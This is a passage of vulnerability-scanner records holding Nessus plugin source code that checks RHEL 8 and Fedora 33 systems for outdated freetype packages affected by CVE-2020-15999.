'rhel-8-for-x86_64-baseos-aus-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-baseos-aus-source-rpms',\n 'rhel-8-for-x86_64-baseos-aus-source-rpms__8_DOT_4'\n ],\n 'rhel_e4s_8_4_appstream': [\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-appstream-e4s-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms__8_DOT_4'\n ],\n 'rhel_e4s_8_4_baseos': [\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms__8_DOT_4'\n ],\n 'rhel_e4s_8_4_highavailability': [\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms__8_DOT_4'\n ],\n 'rhel_e4s_8_4_sap': [\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms__8_DOT_4'\n ],\n 'rhel_e4s_8_4_sap_hana': [\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-sap-solutions-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-source-rpms__8_DOT_4'\n ],\n 'rhel_eus_8_4_appstream': [\n 'rhel-8-for-aarch64-appstream-eus-debug-rpms',\n 'rhel-8-for-aarch64-appstream-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-aarch64-appstream-eus-rpms',\n 'rhel-8-for-aarch64-appstream-eus-rpms__8_DOT_4',\n 'rhel-8-for-aarch64-appstream-eus-source-rpms',\n 'rhel-8-for-aarch64-appstream-eus-source-rpms__8_DOT_4',\n 'rhel-8-for-s390x-appstream-eus-debug-rpms',\n 'rhel-8-for-s390x-appstream-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-s390x-appstream-eus-rpms',\n 'rhel-8-for-s390x-appstream-eus-rpms__8_DOT_4',\n 'rhel-8-for-s390x-appstream-eus-source-rpms',\n 'rhel-8-for-s390x-appstream-eus-source-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-appstream-aus-debug-rpms',\n 'rhel-8-for-x86_64-appstream-aus-rpms',\n 'rhel-8-for-x86_64-appstream-aus-source-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms',\n 'rhel-8-for-x86_64-appstream-eus-debug-rpms',\n 'rhel-8-for-x86_64-appstream-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-appstream-eus-rpms',\n 'rhel-8-for-x86_64-appstream-eus-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-appstream-eus-source-rpms',\n 'rhel-8-for-x86_64-appstream-eus-source-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-appstream-tus-debug-rpms',\n 'rhel-8-for-x86_64-appstream-tus-rpms',\n 'rhel-8-for-x86_64-appstream-tus-source-rpms'\n ],\n 'rhel_eus_8_4_baseos': [\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms',\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-aarch64-baseos-eus-rpms',\n 'rhel-8-for-aarch64-baseos-eus-rpms__8_DOT_4',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms__8_DOT_4',\n 'rhel-8-for-s390x-baseos-eus-debug-rpms',\n 'rhel-8-for-s390x-baseos-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-s390x-baseos-eus-rpms',\n 'rhel-8-for-s390x-baseos-eus-rpms__8_DOT_4',\n 'rhel-8-for-s390x-baseos-eus-source-rpms',\n 'rhel-8-for-s390x-baseos-eus-source-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-baseos-aus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-aus-rpms',\n 'rhel-8-for-x86_64-baseos-aus-source-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-baseos-eus-rpms',\n 'rhel-8-for-x86_64-baseos-eus-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-baseos-tus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-tus-rpms',\n 'rhel-8-for-x86_64-baseos-tus-source-rpms'\n ],\n 'rhel_eus_8_4_crb': [\n 'codeready-builder-for-rhel-8-aarch64-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-debug-rpms__8_DOT_4',\n 'codeready-builder-for-rhel-8-aarch64-eus-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-rpms__8_DOT_4',\n 'codeready-builder-for-rhel-8-aarch64-eus-source-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-source-rpms__8_DOT_4',\n 'codeready-builder-for-rhel-8-s390x-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-debug-rpms__8_DOT_4',\n 'codeready-builder-for-rhel-8-s390x-eus-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-rpms__8_DOT_4',\n 'codeready-builder-for-rhel-8-s390x-eus-source-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-source-rpms__8_DOT_4',\n 'codeready-builder-for-rhel-8-x86_64-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-debug-rpms__8_DOT_4',\n 'codeready-builder-for-rhel-8-x86_64-eus-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-rpms__8_DOT_4',\n 'codeready-builder-for-rhel-8-x86_64-eus-source-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-source-rpms__8_DOT_4'\n ],\n 'rhel_eus_8_4_highavailability': [\n 'rhel-8-for-aarch64-highavailability-eus-debug-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-aarch64-highavailability-eus-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-rpms__8_DOT_4',\n 'rhel-8-for-aarch64-highavailability-eus-source-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-source-rpms__8_DOT_4',\n 'rhel-8-for-s390x-highavailability-eus-debug-rpms',\n 'rhel-8-for-s390x-highavailability-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-s390x-highavailability-eus-rpms',\n 'rhel-8-for-s390x-highavailability-eus-rpms__8_DOT_4',\n 'rhel-8-for-s390x-highavailability-eus-source-rpms',\n 'rhel-8-for-s390x-highavailability-eus-source-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-highavailability-eus-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-highavailability-eus-source-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-source-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-highavailability-tus-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-source-rpms'\n ],\n 'rhel_eus_8_4_resilientstorage': [\n 'rhel-8-for-s390x-resilientstorage-eus-debug-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-s390x-resilientstorage-eus-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-rpms__8_DOT_4',\n 'rhel-8-for-s390x-resilientstorage-eus-source-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-source-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-resilientstorage-eus-debug-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-resilientstorage-eus-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-resilientstorage-eus-source-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-source-rpms__8_DOT_4'\n ],\n 'rhel_eus_8_4_sap': [\n 'rhel-8-for-s390x-sap-netweaver-eus-debug-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-s390x-sap-netweaver-eus-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-rpms__8_DOT_4',\n 'rhel-8-for-s390x-sap-netweaver-eus-source-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-source-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-sap-netweaver-eus-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-sap-netweaver-eus-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-source-rpms__8_DOT_4'\n ],\n 'rhel_eus_8_4_sap_hana': [\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-sap-solutions-eus-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-sap-solutions-eus-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-source-rpms__8_DOT_4'\n ],\n 'rhel_eus_8_4_supplementary': [\n 'rhel-8-for-aarch64-supplementary-eus-rpms',\n 'rhel-8-for-aarch64-supplementary-eus-rpms__8_DOT_4',\n 'rhel-8-for-aarch64-supplementary-eus-source-rpms',\n 'rhel-8-for-aarch64-supplementary-eus-source-rpms__8_DOT_4',\n 'rhel-8-for-s390x-supplementary-eus-rpms',\n 'rhel-8-for-s390x-supplementary-eus-rpms__8_DOT_4',\n 'rhel-8-for-s390x-supplementary-eus-source-rpms',\n 'rhel-8-for-s390x-supplementary-eus-source-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-supplementary-eus-rpms',\n 'rhel-8-for-x86_64-supplementary-eus-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-supplementary-eus-source-rpms',\n 'rhel-8-for-x86_64-supplementary-eus-source-rpms__8_DOT_4'\n ],\n 'rhel_extras_nfv_8': [\n 'rhel-8-for-x86_64-nfv-debug-rpms',\n 'rhel-8-for-x86_64-nfv-rpms',\n 'rhel-8-for-x86_64-nfv-source-rpms',\n 'rhel-8-for-x86_64-nfv-tus-debug-rpms',\n 'rhel-8-for-x86_64-nfv-tus-rpms',\n 'rhel-8-for-x86_64-nfv-tus-source-rpms'\n ],\n 'rhel_extras_rt_8': [\n 'rhel-8-for-x86_64-nfv-debug-rpms',\n 'rhel-8-for-x86_64-nfv-rpms',\n 'rhel-8-for-x86_64-nfv-source-rpms',\n 'rhel-8-for-x86_64-rt-debug-rpms',\n 'rhel-8-for-x86_64-rt-rpms',\n 'rhel-8-for-x86_64-rt-source-rpms',\n 'rhel-8-for-x86_64-rt-tus-debug-rpms',\n 'rhel-8-for-x86_64-rt-tus-rpms',\n 'rhel-8-for-x86_64-rt-tus-source-rpms'\n ],\n 'rhel_tus_8_4_appstream': [\n 'rhel-8-for-x86_64-appstream-tus-debug-rpms',\n 'rhel-8-for-x86_64-appstream-tus-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-appstream-tus-rpms',\n 'rhel-8-for-x86_64-appstream-tus-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-appstream-tus-source-rpms',\n 'rhel-8-for-x86_64-appstream-tus-source-rpms__8_DOT_4'\n ],\n 'rhel_tus_8_4_baseos': [\n 'rhel-8-for-x86_64-baseos-tus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-tus-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-baseos-tus-rpms',\n 'rhel-8-for-x86_64-baseos-tus-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-baseos-tus-source-rpms',\n 'rhel-8-for-x86_64-baseos-tus-source-rpms__8_DOT_4'\n ],\n 'rhel_tus_8_4_highavailability': [\n 'rhel-8-for-x86_64-highavailability-tus-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-highavailability-tus-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-highavailability-tus-source-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-source-rpms__8_DOT_4'\n ]\n};\n\nvar repo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nvar enterprise_linux_flag = rhel_repo_sets_has_enterprise_linux(repo_sets:repo_sets);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\nvar pkgs = [\n {'reference':'freetype-2.9.1-4.el8_3.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary', 'rhel_aus_8_4_appstream', 'rhel_aus_8_4_baseos', 'rhel_e4s_8_4_appstream', 'rhel_e4s_8_4_baseos', 'rhel_e4s_8_4_highavailability', 'rhel_e4s_8_4_sap', 'rhel_e4s_8_4_sap_hana', 'rhel_eus_8_4_appstream', 'rhel_eus_8_4_baseos', 'rhel_eus_8_4_crb', 'rhel_eus_8_4_highavailability', 'rhel_eus_8_4_resilientstorage', 'rhel_eus_8_4_sap', 'rhel_eus_8_4_sap_hana', 'rhel_eus_8_4_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_4_appstream', 'rhel_tus_8_4_baseos', 'rhel_tus_8_4_highavailability']},\n {'reference':'freetype-2.9.1-4.el8_3.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary', 'rhel_aus_8_4_appstream', 'rhel_aus_8_4_baseos', 'rhel_e4s_8_4_appstream', 'rhel_e4s_8_4_baseos', 'rhel_e4s_8_4_highavailability', 'rhel_e4s_8_4_sap', 'rhel_e4s_8_4_sap_hana', 'rhel_eus_8_4_appstream', 'rhel_eus_8_4_baseos', 'rhel_eus_8_4_crb', 'rhel_eus_8_4_highavailability', 'rhel_eus_8_4_resilientstorage', 'rhel_eus_8_4_sap', 'rhel_eus_8_4_sap_hana', 'rhel_eus_8_4_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_4_appstream', 'rhel_tus_8_4_baseos', 'rhel_tus_8_4_highavailability']},\n {'reference':'freetype-2.9.1-4.el8_3.1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary', 'rhel_aus_8_4_appstream', 'rhel_aus_8_4_baseos', 'rhel_e4s_8_4_appstream', 'rhel_e4s_8_4_baseos', 'rhel_e4s_8_4_highavailability', 'rhel_e4s_8_4_sap', 'rhel_e4s_8_4_sap_hana', 'rhel_eus_8_4_appstream', 'rhel_eus_8_4_baseos', 'rhel_eus_8_4_crb', 'rhel_eus_8_4_highavailability', 'rhel_eus_8_4_resilientstorage', 'rhel_eus_8_4_sap', 'rhel_eus_8_4_sap_hana', 'rhel_eus_8_4_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_4_appstream', 'rhel_tus_8_4_baseos', 'rhel_tus_8_4_highavailability']},\n {'reference':'freetype-2.9.1-4.el8_3.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary', 'rhel_aus_8_4_appstream', 'rhel_aus_8_4_baseos', 'rhel_e4s_8_4_appstream', 'rhel_e4s_8_4_baseos', 'rhel_e4s_8_4_highavailability', 'rhel_e4s_8_4_sap', 'rhel_e4s_8_4_sap_hana', 'rhel_eus_8_4_appstream', 'rhel_eus_8_4_baseos', 'rhel_eus_8_4_crb', 'rhel_eus_8_4_highavailability', 'rhel_eus_8_4_resilientstorage', 'rhel_eus_8_4_sap', 'rhel_eus_8_4_sap_hana', 'rhel_eus_8_4_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_4_appstream', 'rhel_tus_8_4_baseos', 'rhel_tus_8_4_highavailability']},\n {'reference':'freetype-devel-2.9.1-4.el8_3.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary', 'rhel_aus_8_4_appstream', 'rhel_aus_8_4_baseos', 'rhel_e4s_8_4_appstream', 'rhel_e4s_8_4_baseos', 'rhel_e4s_8_4_highavailability', 'rhel_e4s_8_4_sap', 'rhel_e4s_8_4_sap_hana', 'rhel_eus_8_4_appstream', 'rhel_eus_8_4_baseos', 'rhel_eus_8_4_crb', 'rhel_eus_8_4_highavailability', 'rhel_eus_8_4_resilientstorage', 'rhel_eus_8_4_sap', 'rhel_eus_8_4_sap_hana', 'rhel_eus_8_4_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_4_appstream', 'rhel_tus_8_4_baseos', 'rhel_tus_8_4_highavailability']},\n {'reference':'freetype-devel-2.9.1-4.el8_3.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary', 'rhel_aus_8_4_appstream', 'rhel_aus_8_4_baseos', 'rhel_e4s_8_4_appstream', 'rhel_e4s_8_4_baseos', 'rhel_e4s_8_4_highavailability', 'rhel_e4s_8_4_sap', 'rhel_e4s_8_4_sap_hana', 'rhel_eus_8_4_appstream', 'rhel_eus_8_4_baseos', 'rhel_eus_8_4_crb', 'rhel_eus_8_4_highavailability', 'rhel_eus_8_4_resilientstorage', 'rhel_eus_8_4_sap', 'rhel_eus_8_4_sap_hana', 'rhel_eus_8_4_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_4_appstream', 'rhel_tus_8_4_baseos', 'rhel_tus_8_4_highavailability']},\n {'reference':'freetype-devel-2.9.1-4.el8_3.1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary', 'rhel_aus_8_4_appstream', 'rhel_aus_8_4_baseos', 'rhel_e4s_8_4_appstream', 'rhel_e4s_8_4_baseos', 'rhel_e4s_8_4_highavailability', 'rhel_e4s_8_4_sap', 'rhel_e4s_8_4_sap_hana', 'rhel_eus_8_4_appstream', 'rhel_eus_8_4_baseos', 'rhel_eus_8_4_crb', 'rhel_eus_8_4_highavailability', 'rhel_eus_8_4_resilientstorage', 'rhel_eus_8_4_sap', 'rhel_eus_8_4_sap_hana', 'rhel_eus_8_4_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_4_appstream', 'rhel_tus_8_4_baseos', 'rhel_tus_8_4_highavailability']},\n {'reference':'freetype-devel-2.9.1-4.el8_3.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary', 'rhel_aus_8_4_appstream', 'rhel_aus_8_4_baseos', 'rhel_e4s_8_4_appstream', 'rhel_e4s_8_4_baseos', 'rhel_e4s_8_4_highavailability', 'rhel_e4s_8_4_sap', 'rhel_e4s_8_4_sap_hana', 'rhel_eus_8_4_appstream', 'rhel_eus_8_4_baseos', 'rhel_eus_8_4_crb', 'rhel_eus_8_4_highavailability', 'rhel_eus_8_4_resilientstorage', 'rhel_eus_8_4_sap', 'rhel_eus_8_4_sap_hana', 'rhel_eus_8_4_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_4_appstream', 'rhel_tus_8_4_baseos', 'rhel_tus_8_4_highavailability']}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n var repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp']) && !enterprise_linux_flag) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference &&\n release &&\n (rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets) || (!exists_check || rpm_exists(release:release, rpm:exists_check))) &&\n rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype / freetype-devel');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:38:20", "description": "Update to freetype 2.10.4 which fixes security flaw CVE-2020-15999.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-10-26T00:00:00", "type": "nessus", "title": "Fedora 33 : freetype (2020-768b1690f8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:freetype", "cpe:/o:fedoraproject:fedora:33"], "id": "FEDORA_2020-768B1690F8.NASL", "href": "https://www.tenable.com/plugins/nessus/141882", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-768b1690f8.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141882);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"FEDORA\", value:\"2020-768b1690f8\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Fedora 33 : freetype (2020-768b1690f8)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to freetype 2.10.4 which fixes security flaw CVE-2020-15999.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-768b1690f8\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected freetype package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n 